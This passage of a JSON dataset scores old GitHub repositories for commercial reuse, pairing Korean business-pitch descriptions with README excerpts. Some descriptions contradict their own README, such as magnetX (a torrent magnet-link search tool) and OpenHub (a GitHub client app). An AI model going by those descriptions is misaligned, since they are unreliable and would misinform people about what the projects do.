위한 실용적인 가이드로, 초보자도 따라 할 수 있는 명확한 설명서 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 웹 개발 초보자 대상 구독형 강의 서비스로 판매\n2. **기업 내부 교육 도구**: 새 직","readme_excerpt":"# react-howto\n\nIf you’re new to React (or frontend in general) you may find the ecosystem confusing. There are a few reasons for this.\n\n* React has historically been targeted at early-adopters and experts\n* Facebook only open-sources what it actually uses, so it doesn’t focus on tooling for smaller-than-Facebook projects\n* There’s a lot of bad marketing masquerading as React guides\n\nThroughout this document, I’ll assume you’ve built a web page with HTML, CSS and JavaScript.\n\n## Why should you listen to me?\n\nThere’s a ton of conflicting advice about React out there; why listen to me?\n\nI was one of the original members of the Facebook team that built and open-sourced React. I’m no longer at Facebook and I’m now at a small startup, so I have a non-Facebook perspective as well.\n\n## How to tackle the React ecosystem\n\nAll software is built on a stack of technologies, and you need to understand enough of that stack to build your app. The reason why the React ecosystem of tooling seems overwhe","composite_score":0.3127,"license_safety_tag":"unknown"},{"name":"jakogut/tinyvm","github_url":"https://github.com/jakogut/tinyvm","stars":6,"language":"C","license":"mit","abandonment_months":87,"description":"# jakogut/tinyvm 상용화 분석\n\n## 왜 보물인가\n매우 가볍고 빠른 프로그램 실행 환경을 만드는 핵심 기술로, 복잡한 소프트웨어를 간단하게 실행할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 웹브라우저에서 직접 프로그램을 작성하고 실행하는 온라인 코딩 교육 플랫폼\n2. **내부 업무 도구**: 기업 내부","readme_excerpt":"TinyVM is a virtual machine with the goal of having a small footprint.\nLow memory usage, a small amount of code, and a small binary.\n\nBuilding can be accomplished on UNIX-like systems with make and GCC.\n\nThere are no external dependencies, save the C standard library.\n\nBuilding can be accomplished using \"make,\" or \"make rebuild\".\n\nTo build a debug version, add \"DEBUG=yes\" after \"make\". To build a binary with\nprofiling enabled, add \"PROFILE=yes\" after \"make\".\n\nI can be reached at \"joseph.kogut(at)gmail.com\"\n","composite_score":0.3126,"license_safety_tag":"safe"},{"name":"linkedin/greykite","github_url":"https://github.com/linkedin/greykite","stars":8,"language":"Python","license":"BSD-2-Clause","abandonment_months":15,"description":"# LinkedIn Greykite 저장소 분석\n\n## 왜 보물인가\n미래의 판매량, 주가, 방문객 수 등을 자동으로 예측하는 AI 도구로, 기업들이 더 나은 의사결정을 내릴 수 있도록 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 유통업체나 온라인 쇼핑몰이 월 구독으로 월별 매출을 미리 예측하는 웹 대시보드\n- **내부 업무 도구","readme_excerpt":"﻿Greykite: A flexible, intuitive and fast forecasting and anomaly detection library\n\n.. raw:: html\n\n   <p align=\"center\">\n   <img src=\"https://github.com/linkedin/greykite/blob/master/LOGO-C8.png\" width=\"450\" height=\"300\">\n   </p>\n\nWhy Greykite?\n-------------\n\nThe Greykite library provides flexible, intuitive and fast forecasts through its flagship algorithm, Silverkite.\n\nSilverkite algorithm works well on most time series, and is especially adept for those with changepoints in trend or seasonality,\nevent/holiday effects, and temporal dependencies.\nIts forecasts are interpretable and therefore useful for trusted decision-making and insights.\n\nThe Greykite library provides a framework that makes it easy to develop a good forecast model,\nwith exploratory data analysis, outlier/anomaly preprocessing, feature extraction and engineering, grid search,\nevaluation, benchmarking, and plotting.\nOther open source algorithms can be supported through Greykite’s interface to take advantage of this f","composite_score":0.3126,"license_safety_tag":"safe"},{"name":"ngrx/store","github_url":"https://github.com/ngrx/store","stars":6,"language":"TypeScript","license":"mit","abandonment_months":103,"description":"# ngrx/store 분석 보고서\n\n## 왜 보물인가\n웹 애플리케이션의 복잡한 데이터 흐름을 체계적으로 관리해주는 도구로, 대규모 프로젝트에서 버그를 줄이고 유지보수를 쉽게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사용자 정보, 설정, 작업 상태를 안정적으로 관리하는 대시보드형 웹 서비스\n- **내부 업무 도구**: 여러 부서","readme_excerpt":"---\n# This repository is for version 2.x of @ngrx/store.\n# [Click here for the latest version (4.x)](https://github.com/ngrx/platform)\n---\n\n## @ngrx/store\nRxJS powered state management for Angular applications, inspired by Redux\n\n[![Join the chat at https://gitter.im/ngrx/store](https://badges.gitter.im/ngrx/store.svg)](https://gitter.im/ngrx/store?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![CircleCI Status for ngrx/store](https://circleci.com/gh/ngrx/store.svg?style=shield&circle-token=aea1fc73de3419cd926fc95e627e036113646fd8\n)](https://circleci.com/gh/ngrx/store)\n[![npm version](https://badge.fury.io/js/%40ngrx%2Fstore.svg)](https://www.npmjs.com/package/@ngrx/store)\n\n@ngrx/store is a controlled state container designed to help write performant, consistent applications\non top of Angular. Core tenets:\n- State is a single immutable data structure\n- Actions describe state changes\n- Pure functions called reducers take the previous state and the next acti","composite_score":0.3125,"license_safety_tag":"safe"},{"name":"wwdc/2021","github_url":"https://github.com/wwdc/2021","stars":6,"language":"Swift","license":"unknown","abandonment_months":15,"description":"# wwdc/2021 저장소 분석\n\n## 왜 보물인가\nApple의 공식 개발자 컨퍼런스(WWDC) 2021년도 자료를 한곳에 정리한 것으로, iOS/Mac 앱 개발자들이 최신 기술 트렌드를 빠르게 학습할 수 있는 종합 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Apple 개발자를 위한 기술 교육/학습 플랫폼 (WWDC 비디오","readme_excerpt":"# WWDC 2021 - Swift Student Challenge\n![WWDC2021 Logo](logo.png)\n\nList of student submissions for the WWDC 2021 - Swift Student Challenge.\n\n### How to add your submission?\n1. [Click here](https://github.com/wwdc/2021/edit/main/Template.md) to fork this repository and edit the `Template.md` file.\n2. Fill out the document based on the example in the comment below.\n3. Make a new Pull Request and wait for the review.\n\n#### How to update your submission?\nIf you would like to update your submission status please find your file in `Submission` directory. Edit file, update status and create Pull Request.\n\n### Submissions\n\n| Name | Source |    Video    | Technologies | Status |\n|-----:|:------:|:-----------:|:-------------|:------:|\n|[A. Alkan Caner](https://github.com/AlkanCaner)|[GitHub](https://github.com/AlkanCaner/StylizedArt)|[YouTube](https://www.youtube.com/watch?v=V2-lZlgsD1k&t=4s)|SwiftUI, CoreML|![Submitted](https://img.shields.io/badge/submitted-slategrey?style=for-the-badge)|\n|[Ada","composite_score":0.3125,"license_safety_tag":"unknown"},{"name":"ThirtyDegreesRay/OpenHub","github_url":"https://github.com/ThirtyDegreesRay/OpenHub","stars":7,"language":"Java","license":"gpl-3.0","abandonment_months":24,"description":"# OpenHub 저장소 분석\n\n## 왜 보물인가\nGitHub 같은 개발자 커뮤니티 플랫폼을 직접 만들 수 있는 오픈소스 기반을 제공해서, 기업이나 단체가 자신의 커뮤니티를 독립적으로 운영할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 커뮤니티 호스팅 플랫폼으로 월 구독료를 받고 기업에 제공\n2. **내부 업무 도구*","readme_excerpt":"English | [中文](/README-cn.md)\n# OpenHub\n[![Releases](https://img.shields.io/badge/android-5.0%2B-brightgreen.svg)](https://play.google.com/store/apps/details?id=com.thirtydegreesray.openhub)\n[![Releases](https://img.shields.io/github/release/ThirtyDegreesRay/OpenHub.svg)](https://github.com/ThirtyDegreesRay/OpenHub/releases/latest)\n\nAn **open-source** GitHub Android client app, faster and concise.\n\n[![Google Play](https://raw.githubusercontent.com/ThirtyDegreesRay/OpenHub/master/art/google_play.png?raw=true)](https://play.google.com/store/apps/details?id=com.thirtydegreesray.openhub)\n[![Coolapk](https://raw.githubusercontent.com/ThirtyDegreesRay/OpenHub/master/art/coolapk.png?raw=true)](https://www.coolapk.com/apk/com.thirtydegreesray.openhub)\n\n## Features\n\n### App\n* One login types (OAuth)\n* Light, dark, and AMOLED dark theme, multiple accent colors\n* Markdown and code highlighting support\n* English, Simplified Chinese, Hebrew, German, Hindi, Portuguese, Korea, Spanish, Traditional Ch","composite_score":0.3124,"license_safety_tag":"restricted"},{"name":"youusername/magnetX","github_url":"https://github.com/youusername/magnetX","stars":17,"language":"Objective-C","license":"unknown","abandonment_months":39,"description":"# magnetX 저장소 분석\n\n## 왜 보물인가\n자석(magnet)처럼 관련 데이터를 끌어당겨 정렬하는 기술로, 흩어진 정보를 자동으로 정리해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 정보 자동 정렬 솔루션을 월 구독형으로 판매\n- **내부 업무 도구**: 대기업의 흩어진 문서와 데이터를 자동으로 분류하는 시스템 구축\n","readme_excerpt":"![image.gif](https://github.com/youusername/magnetX/blob/master/image.gif)\n\n\n\n## 本项目仅用于学习交流---严禁用于非法用途---若有侵犯，联系删除\n## 本项目仅用于学习交流---严禁用于非法用途---若有侵犯，联系删除\n## 本项目仅用于学习交流---严禁用于非法用途---若有侵犯，联系删除\n\n## magnetX是什么?\n\n问：磁力搜索网站老是弹少儿不宜的广告，同事看到多不好啊怎么办？\n\n答：magnetX。\n\n\n问：我有一个神奇车牌，但是到处都找不到下载地址怎么办？\n\n答：magnetX。\n\n问：别人分享的作品，原始链接下不了怎么办？\n\n答：magnetX。\n\n问：某老师的教学视频，我想观摩怎么办？\n\n答：magnetX\n\n问：骑兵vs步兵？你是谁的粉丝？\n\n答：magnetX。\n\n## 在线播放功能说明\n在线播放是配合[webtorrent](https://github.com/webtorrent/webtorrent-desktop/releases)桌面版进行的，需要单独下载，点击在线播放后会跳转到webtorrent添加任务，开始缓冲才能进去播放，webtorrent加载资源得等待几分，如果几分钟后还是没有速度，删掉，换一个磁力。\n\n## 更新日志\n\n## magnetX有哪些功能？\n\n* 不再有网页弹窗广告。\n* 搜索网站一键切换。\n* 配合迅雷、115等网盘一键下载资源。\n* 查看文件大小不会误下葫芦娃。\n* [webtorrent](https://github.com/webtorrent/webtorrent-desktop/releases)方法在线播放\n\n## 有问题反馈\n在使用中有任何问题，欢迎反馈给我，可以用以下联系方式跟我交流\n\n\n##感激\n\n感谢以下的开源项目,排名不分先后\n\n* [AFNetworking](https://github.com/AFNetworking/AFNetworking) \n* [Ono](https://github.com/mattt/Ono) \n* [SSZipArchive](https://github.com/wuhaiwei/SSZipArchive) \n* [yaqinking](https://git","composite_score":0.3123,"license_safety_tag":"unknown"},{"name":"howiehu/ddd-architecture-samples","github_url":"https://github.com/howiehu/ddd-architecture-samples","stars":5,"language":"Java","license":"MIT","abandonment_months":9,"description":"# howiehu/ddd-architecture-samples 분석\n\n## 왜 보물인가\n소프트웨어를 체계적으로 설계하는 방법론을 실제 코드 예제로 보여주기 때문에, 규모가 커질수록 복잡해지는 소프트웨어 프로젝트를 정리정돈하고 싶은 개발팀에게 실질적인 해결책을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 이커머스 플랫폼이나 CRM 시스","readme_excerpt":"# DDD Architecture Samples\n\n> *At first, you must remember, a simple blog system often does not need to use a DDD workshop (like Event Storming) to design and apply a complex architecture.*\n> *However, when you are skilled, you will find DDD thinking is very usefully for your daily thought. Also, your modeling speed will be more and more fast. So you can quickly complete all the design process in your brain.*\n\nThese examples aim to demonstrate a DDD architecture with different tech stacks, which can work in the real project and let you understand and reference quickly.\n\nWhen designing these samples, I refer to the following architecture patterns:\n\n- [Hexagonal Architecture](http://alistair.cockburn.us/Hexagonal+architecture)\n- [Onion Architecture](https://jeffreypalermo.com/2008/07/the-onion-architecture-part-1/)\n- [Clean Architecture](https://blog.cleancoder.com/uncle-bob/2012/08/13/the-clean-architecture.html)\n- [Microservice](https://www.martinfowler.com/microservices/)\n\nAnd I desig","composite_score":0.3123,"license_safety_tag":"safe"},{"name":"learning511/cs224n-learning-camp","github_url":"https://github.com/learning511/cs224n-learning-camp","stars":9,"language":"Python","license":"unknown","abandonment_months":89,"description":"# CS224N Learning Camp 상용화 분석\n\n## 왜 보물인가\n스탠포드 대학의 최고 수준 자연언어처리(AI가 텍스트를 이해하게 하는 기술) 강의 자료를 완전히 공개한 교육 콘텐츠로, 기업 직원들의 AI 역량 강화 교육에 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 교육 SaaS 플랫폼**\n- 기업의 임직원을 대상으로 한 AI","readme_excerpt":"# 深度学习之自然语言处理斯坦福大学CS224n课程集训营\n\n## 课程资料\n1. [课程主页](https://web.stanford.edu/class/cs224n/)  \n2. [中文笔记](http://www.hankcs.com/nlp/cs224n-introduction-to-nlp-and-deep-learning.html)  \n3. [课程视频](https://study.163.com/course/courseMain.htm?courseId=1006185093&_trace_c_p_k2_=beb4b40d66ab4ff89f94a5f77c099d16)  \n4.  实验环境推荐使用Linux或者Mac系统，以下环境搭建方法皆适用:  \n    [Docker环境配置](https://github.com/ufoym/deepo)  \n    [本地环境配置](https://github.com/learning511/cs224n-learning-camp/blob/master/environment.md)\n\n#### 重要🔥🔥一些的资源：\n1. [Dr.Wu 博客71篇(机器学习、深度学习、强化学习、对抗网络)](https://me.csdn.net/dukuku5038)  \n2. [Dr.Wu 本人知乎](https://www.zhihu.com/people/Dr.Wu/activities)  \n3. [深度学习斯坦福教程](http://deeplearning.stanford.edu/wiki/index.php/UFLDL%E6%95%99%E7%A8%8B)\n4. [廖雪峰python3教程](https://www.liaoxuefeng.com/article/001432619295115c918a094d8954bd493037b03d27bf9a9000)\n5. [github教程](https://www.liaoxuefeng.com/wiki/0013739516305929606dd18361248578c67b8067c8c017b000)\n6. [莫烦机器学习教程](https://morvanzhou.github.io/tutorials)\n7. [深度学习经典","composite_score":0.3122,"license_safety_tag":"unknown"},{"name":"tudou527/marketch","github_url":"https://github.com/tudou527/marketch","stars":5,"language":"JavaScript","license":"gpl-3.0","abandonment_months":91,"description":"# marketch 프로젝트 분석\n\n## 왜 보물인가\n디자인 도구에서 만든 파일을 프로그래밍 코드로 자동 변환해주는 기술로, 디자이너와 개발자 간의 시간 낭비적인 작업을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 디자인 협업 플랫폼(Figma, Sketch 등)에 플러그인으로 통합하여 클라우드 기반 자동 변환 서비","readme_excerpt":"# Marketch\n\nMarketch is a Sketch plugin that helps you generate html page from Sketch file where you can get measures and CSS styles directly.\n\n![Banner](resource/logo.png)\n\n## Notice\n\n* This plugin requires artboard to work.\n\n## Preview\n\n![preview](resource/preview.png)\n\n## Demo\n\n[http://tudou527.github.io/marketch/](http://tudou527.github.io/marketch/)\n\n## Install\n\n### Manual\n\n1. Download the latest release at: https://github.com/tudou527/marketch/releases\n2. Unzip `marketch.sketchplugin.zip`\n3. Double click `marketch.sketchplugin`\n\n## Usage\n\n* Select pages and artboards in the upper left corner.\n* Select an element to view its location and CSS styles on the right side of the page.\n* Select an element and hover another to see the spacing between them. \n\n## Contribute\n\nThe plugin is in active development, any help would be appreciated.\n\nIf you believe you have found a bug, please open an issud according to [this template](issue-template.md).\n\nIf you want to contribute to our code base","composite_score":0.312,"license_safety_tag":"restricted"},{"name":"WireGuard/WireGuard","github_url":"https://github.com/WireGuard/WireGuard","stars":5,"language":"C","license":"gpl-2.0","abandonment_months":78,"description":"# WireGuard 프로젝트 분석\n\n## 왜 보물인가\n인터넷 연결을 안전하게 보호하는 기술로, 기존 방식보다 훨씬 간단하고 빠르면서도 보안이 뛰어나 VPN, 원격 접속 등 여러 분야에서 빠르게 채택되고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개인용 VPN 서비스**: 공공 와이파이에서 안전한 인터넷 접속을 원하는 개인 사용자를 위한 구독형 서비스\n","readme_excerpt":"# WireGuard &mdash; fast, modern, secure kernel VPN tunnel\n#### by [Jason A. Donenfeld](mailto:Jason@zx2c4.com) of [Edge Security](https://www.edgesecurity.com/)\n\nWireGuard is a novel VPN that runs inside the Linux Kernel and utilizes **state-of-the-art cryptography**. It aims to be faster, simpler, leaner, and more useful than IPsec, while avoiding the massive headache. It intends to be considerably more performant than OpenVPN. WireGuard is designed as a general purpose VPN for running on embedded interfaces and super computers alike, fit for many different circumstances. It runs over UDP.\n\n**More information may be found at [WireGuard.com](https://www.wireguard.com/).**\n\n## License\n\nThis project is released under the [GPLv2](COPYING).\n","composite_score":0.312,"license_safety_tag":"restricted"},{"name":"basscss/basscss","github_url":"https://github.com/basscss/basscss","stars":5,"language":"CSS","license":"mit","abandonment_months":41,"description":"# Basscss 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 기본 디자인 요소들(버튼, 색상, 레이아웃 등)을 미리 준비해둔 가볍고 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 빠르게 관리자 대시보드나 협업 도구를 만들 때 기초 디자인으로 활용\n2. **내부 업무 도구**: 회사의 전용 시스템(E","readme_excerpt":"# Basscss\n\nLow-level CSS toolkit – the original [Functional CSS][functional-css] library <https://basscss.com>\n\n[![Build Status](https://travis-ci.org/basscss/basscss.svg)](https://travis-ci.org/basscss/basscss)\n[![npm version](https://badge.fury.io/js/basscss.svg)](https://badge.fury.io/js/basscss)\n\n## Lightning-Fast Modular CSS with No Side Effects\n\nBasscss is a lightweight collection of immutable utilities designed for speed, clarity, performance, and scalability.\n\n## Stable\n\nBasscss v8 is the final version of Basscss, which means no major, breaking changes will be introduced.\nMinor features and patches may be added, but\ndue to the nature of this CSS approach, there are virtually no bugs in Basscss.\n\n---\n\n## Features\n\n### Code with Confidence\n\nUsing clear, humanized naming conventions, Basscss is quick to internalize\nand easy to reason about while speeding up development time with more scalable,\nmore readable code.\n\n### No Side Effects\n\nThings behave exactly as expected with immutab","composite_score":0.3119,"license_safety_tag":"safe"},{"name":"diegohaz/arc","github_url":"https://github.com/diegohaz/arc","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":52,"description":"# diegohaz/arc 분석\n\n## 왜 보물인가\n사용자 인터페이스를 더 쉽게 설계하고 관리할 수 있도록 도와주는 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 디자인 SaaS**: 누구나 손쉽게 웹사이트 레이아웃을 만들 수 있는 온라인 도구로 제공\n2. **디자인 팀 협업 도구**: 회사 내 디자인팀이 UI 요소를 표준화하고 공유하는 내부 플","readme_excerpt":"<p align=\"center\">\n  <img alt=\"arclogo\" src=\"https://cloud.githubusercontent.com/assets/3068563/23199029/55e9d55a-f8aa-11e6-91a2-74b82db3813c.png\"><br><br>\n  <a href=\"https://travis-ci.org/diegohaz/arc\"><img src=\"https://img.shields.io/travis/diegohaz/arc/master.svg?style=flat-square\" alt=\"Build Status\" /></a>\n  <a href=\"https://codecov.io/gh/diegohaz/arc\"><img src=\"https://img.shields.io/codecov/c/github/diegohaz/arc.svg?style=flat-square\" alt=\"Coverage Status\" /></a>\n  <a href=\"https://gitter.im/diegohaz/arc\"><img src=\"https://img.shields.io/badge/chat-on%20gitter-1dce73.svg?style=flat-square\" alt=\"Gitter chat\" /></a>\n</p>\n\n**ARc** (Atomic React) is a React starter kit based on the [Atomic Design](http://bradfrost.com/blog/post/atomic-web-design/) methodology. It's progressive, which means that you can start with the basic boilerplate and try the other features when you are comfortable.\n\n- **[Demo](https://arc.js.org)**\n- **[Documentation](https://github.com/diegohaz/arc/wiki)**\n\n<br","composite_score":0.3118,"license_safety_tag":"unknown"},{"name":"bendc/animateplus","github_url":"https://github.com/bendc/animateplus","stars":27,"language":"JavaScript","license":"mit","abandonment_months":96,"description":"# bendc/animateplus 상용화 분석\n\n## 왜 보물인가\n웹사이트와 앱에서 움직이는 그래픽 효과를 누구나 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 마케팅 팀이 광고 배너와 소개 영상을 직접 제작하는 웹 기반 애니메이션 에디터\n2. **내부 업무 도구**: 디자인팀 없는 스타트업이 제품 시연 영상과 ","readme_excerpt":"# Animate Plus\n\nAnimate Plus is a JavaScript animation library focusing on performance and authoring flexibility. It\naims to deliver a steady 60 FPS and weighs less than 3 KB (minified and compressed), making it particularly well-suited for mobile.\n\n## Getting started\n\n`npm install animateplus` or download `animateplus.js` and start animating things:\n\n```javascript\nimport animate from \"/animateplus.js\";\n\nanimate({\n  elements: \"div\",\n  duration: 2000,\n  delay: index => index * 100,\n  transform: [\"scale(0)\", \"scale(1)\"]\n})\n.then(options => animate({\n  ...options,\n  transform: [\"translate(0%)\", \"translate(500%)\"]\n}));\n```\n\n[Preview this example &#8594;](http://animateplus.com/examples/getting-started/)\n\n## Options\n\n### elements\n\n| Default | Type\n| :---    | :---\n| `null`  | String \\| Element \\| NodeList \\| Array\n\nDetermines the DOM elements to animate. You can either pass it a CSS selector or DOM elements.\n\n```javascript\nanimate({\n  elements: document.body.children,\n  transform: [\"rotate(","composite_score":0.3117,"license_safety_tag":"safe"},{"name":"JoeHetfield/You-Dont-Know-JS","github_url":"https://github.com/JoeHetfield/You-Dont-Know-JS","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":63,"description":"# You-Dont-Know-JS 저장소 분석\n\n## 왜 보물인가\n자바스크립트 언어의 핵심 개념을 깊이 있게 설명하는 교육 자료로, 프로그래밍 학습자들이 가장 많이 찾는 무료 학습 자원입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 유료 자바스크립트 강좌와 함께 이 자료를 기반으로 한 심화 학습 모듈 판매\n2. **기업 직원 교육 서비","readme_excerpt":"# 你不懂JS（系列丛书）\n\n这是一套深入探讨 JavaScript 语言核心机制的系列丛书。本系列的第一版已经完成。\n\n<a href=\"http://shop.oreilly.com/product/0636920039303.do\"><img src=\"up %26 going/cover.jpg\" width=\"75\"></a>&nbsp;\n<a href=\"http://shop.oreilly.com/product/0636920026327.do\"><img src=\"scope %26 closures/cover.jpg\" width=\"75\"></a>&nbsp;\n<a href=\"http://shop.oreilly.com/product/0636920033738.do\"><img src=\"this %26 object prototypes/cover.jpg\" width=\"75\"></a>&nbsp;\n<a href=\"http://shop.oreilly.com/product/0636920033745.do\"><img src=\"types %26 grammar/cover.jpg\" width=\"75\"></a>&nbsp;\n<a href=\"http://shop.oreilly.com/product/0636920033752.do\"><img src=\"async %26 performance/cover.jpg\" width=\"75\"></a>&nbsp;\n<a href=\"http://shop.oreilly.com/product/0636920033769.do\"><img src=\"es6 %26 beyond/cover.jpg\" width=\"75\"></a>\n\n欢迎通过提交 PR 改进代码段，讲解等，来为此内容的质量做出贡献。虽然也欢迎拼写错误的修改，但是它们很可能将在一般的编辑过程中被找出来，因此对本代码库不一定很重要。\n\n**要了解更多关于这个系列丛书背后的动机和角度，请参阅[前言](preface.md)。**\n\n## 译者的话\n\n感谢社区中各位的大力支持，译者再次奉上一点点福利：阿里云产品券，享受所有官网优惠，并抽取幸运大奖：[点击这里领取](https://promotion.a","composite_score":0.3117,"license_safety_tag":"unknown"},{"name":"facebookincubator/beringei","github_url":"https://github.com/facebookincubator/beringei","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":96,"description":"# Beringei 분석 보고서\n\n## 왜 보물인가\n페이스북이 만든 이 기술은 엄청난 양의 시계열 데이터(시간에 따라 변하는 숫자들)를 매우 빠르고 효율적으로 저장하고 검색할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 주식·암호화폐 실시간 모니터링 SaaS**\n- 투자자들에게 수백만 개의 가격 데이터를 초 단위로 제공하는 유료 서비스로 운영 가능합","readme_excerpt":"** THIS REPO HAS BEEN ARCHIVED AND IS NO LONGER BEING ACTIVELY MAINTAINED **\n\n# Beringei [![CircleCI](https://circleci.com/gh/facebookincubator/beringei/tree/master.svg?style=svg)](https://circleci.com/gh/facebookincubator/beringei/tree/master)\nA high performance, in memory time series storage engine\n\n<img src=\"./beringei_logo_clear.png\" height=200 width=200>\n\nIn the fall of 2015, we published the [paper “Gorilla: A Fast, Scalable, In-Memory Time Series Database”](http://www.vldb.org/pvldb/vol8/p1816-teller.pdf) at VLDB 2015. Beringei is the open source representation of the ideas presented in this paper.\n\nBeringei is a high performance time series storage engine. Time series are commonly used as a representation of statistics, gauges, and counters for monitoring performance and health of a system. \n\n## Features\n\nBeringei has the following features:\n\n* Support for very fast, in-memory storage, backed by disk for persistence. Queries to the storage engine are always served out of memory","composite_score":0.3116,"license_safety_tag":"unknown"},{"name":"NVlabs/few-shot-vid2vid","github_url":"https://github.com/NVlabs/few-shot-vid2vid","stars":34,"language":"Python","license":"NOASSERTION","abandonment_months":56,"description":"","readme_excerpt":"<img src='imgs/illustration.gif' align=\"right\" width=200>\r\n\r\n<br><br><br><br>\r\n\r\n# Few-shot vid2vid\r\n### [Project](https://nvlabs.github.io/few-shot-vid2vid/) | [YouTube](https://youtu.be/8AZBuyEuDqc) | [arXiv](https://arxiv.org/abs/1910.12713)\r\n\r\n<h3><b>[Note] This repo is now deprecated. Please refer to the new Imaginaire repo: https://github.com/NVlabs/imaginaire.</b></h3>\r\n\r\nPytorch implementation for few-shot photorealistic video-to-video translation. It can be used for generating human motions from poses, synthesizing people talking from edge maps, or turning semantic label maps into photo-realistic videos. The core of video-to-video translation is image-to-image translation. Some of our work in that space can be found in [pix2pixHD](https://github.com/NVIDIA/pix2pixHD) and [SPADE](https://github.com/NVlabs/SPADE). <br><br>\r\n[Few-shot Video-to-Video Synthesis](https://nvlabs.github.io/few-shot-vid2vid/)  \r\n [Ting-Chun Wang](https://tcwang0509.github.io/), [Ming-Yu Liu](http://min","composite_score":0.3116,"license_safety_tag":"unknown"},{"name":"junyanz/BicycleGAN","github_url":"https://github.com/junyanz/BicycleGAN","stars":74,"language":"Python","license":"NOASSERTION","abandonment_months":71,"description":"# BicycleGAN 평가 보고서\n\n## 왜 보물인가\n사진을 마치 그림처럼, 그림을 마치 사진처럼 자동으로 변환해주는 기술로, 영상 제작, 게임 개발, 디자인 업계에서 작업 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사진 필터 앱이나 웹사이트에서 \"사진을 유화로 변환\" 같은 고급 필터 기능을 구독료 형태로 제","readme_excerpt":"<img src='imgs/day2night.gif' align=\"right\" width=360>\n\n<br><br><br><br>\n\n# BicycleGAN\n[Project Page](https://junyanz.github.io/BicycleGAN/) |  [Paper](https://arxiv.org/abs/1711.11586) | [Video](https://youtu.be/JvGysD2EFhw)\n\n\nPytorch implementation for multimodal image-to-image translation. For example,  given the same night image, our model is able to synthesize possible day images with different types of lighting, sky and clouds. The training requires paired data.\n\n**Note**: The current software works well with PyTorch 0.41+. Check out the older [branch](https://github.com/junyanz/BicycleGAN/tree/pytorch0.3.1) that supports PyTorch 0.1-0.3.\n\n<img src='imgs/teaser.jpg' width=850>  \n\n**Toward Multimodal Image-to-Image Translation.**  \n[Jun-Yan Zhu](https://www.cs.cmu.edu/~junyanz/),\n [Richard Zhang](https://richzhang.github.io/), [Deepak Pathak](http://people.eecs.berkeley.edu/~pathak/), [Trevor Darrell](https://people.eecs.berkeley.edu/~trevor/), [Alexei A. Efros](https://people.eec","composite_score":0.3116,"license_safety_tag":"unknown"},{"name":"airbnb/react-sketchapp","github_url":"https://github.com/airbnb/react-sketchapp","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":7,"description":"# react-sketchapp 보물 분석\n\n## 왜 보물인가\n디자이너가 만든 화면을 자동으로 개발자용 코드로 변환해주는 기술로, 디자인과 개발 사이의 시간 낭비를 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 디자인 협업 SaaS**\n- 피그마, 스케치 같은 디자인 도구와 연동하여 실시간으로 디자인을 코드화하는 구독 서비스\n\n**2.","readme_excerpt":"<div align=\"center\">\n  <img alt=\"react-sketchapp\" src=\"https://cldup.com/MxSVEkc_gb.png\" style=\"max-height:163px; width:100; height: auto; max-width:100%\" />\n</div>\n\n<div align=\"center\">\n  <strong>render React components to Sketch; tailor-made for design systems</strong>\n</div>\n\n## Quick-start 🏃‍\n\nFirst, make sure you have installed [Sketch](http://sketch.com) version 50+, & a recent [npm](https://nodejs.org/en/download/).\n\nOpen a new Sketch file, then in a terminal:\n\n```bash\ngit clone https://github.com/airbnb/react-sketchapp.git\ncd react-sketchapp/examples/basic-setup && npm install\n\nnpm run render\n```\n\nNext, [check out some more examples](https://github.com/airbnb/react-sketchapp/tree/master/examples)!\n\n![readme-intro](https://cloud.githubusercontent.com/assets/591643/24777148/e742cd0e-1ad8-11e7-8751-090f6b2db514.png)\n\n[![npm](https://img.shields.io/npm/v/react-sketchapp.svg)](https://www.npmjs.com/package/react-sketchapp) ![Sketch.app](https://img.shields.io/badge/Sketch.app-43--50","composite_score":0.3116,"license_safety_tag":"safe"},{"name":"futurice/backend-best-practices","github_url":"https://github.com/futurice/backend-best-practices","stars":8,"language":"","license":"NOASSERTION","abandonment_months":81,"description":"# Futurice Backend Best Practices 분석\n\n## 왜 보물인가\n앱이나 웹 서비스를 만드는 기업들이 안정적이고 효율적으로 개발하기 위한 검증된 지침서 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 새로운 팀이 합류할 때 개발 표준을 빠르게 교육하는 온보딩 교재로 활용\n2. **내부 업무 도구**: 개발팀의 코","readme_excerpt":"Backend development best practices\n==================================\n\n<!-- START doctoc generated TOC please keep comment here to allow auto update -->\n<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->\n**Table of Contents**  *generated with [DocToc](https://github.com/thlorenz/doctoc)*\n\n- [Translations of this document](#translations-of-this-document)\n- [N Commandments](#n-commandments)\n- [General points on guidelines](#general-points-on-guidelines)\n- [Development environment setup in README.md](#development-environment-setup-in-readmemd)\n- [Data persistence](#data-persistence)\n  - [General considerations](#general-considerations)\n  - 